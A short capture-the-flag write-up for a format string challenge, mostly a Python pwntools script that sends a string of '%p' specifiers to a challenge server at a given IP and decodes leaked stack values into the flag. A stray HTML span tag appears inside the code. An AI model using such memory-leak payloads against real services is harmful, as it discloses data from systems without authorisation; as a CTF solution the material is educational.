Tags: formatstring 

Rating:

This is a format string bug. There's ASLR enabled and it's a 64-bit binary, as can be observed by sending a few %p values a few times. As it turns out, they have put the flag on the stack, so dumping a bunch of stack values results in the flag being disclosed, and all we have to do is put it in the right byte order.

~~~
from pwn import *
import string

def try_readline(conn):
   while True:
      try:
         line = conn.readline()
         return line
      except EOFError:
         continue

def make_ascii_hex_decodable(s):
   if len(s) % 2 == 1:
      return '0' + s
   else:
      return s

r = remote('<span>91.231.84.36', 9001)

try_readline(r) # wanna see?
r.writeline('%p' * 100)
try_readline(r) # ok, so...
memory_dump = try_readline(r)

memory_dump = string.replace(memory_dump, '(nil)', '')
memory_dump = memory_dump.split('0x')
memory_dump = map(make_ascii_hex_decodable, memory_dump)

print ''.join( [pointer.decode('hex')[::-1] for pointer in memory_dump] )
~~~</span>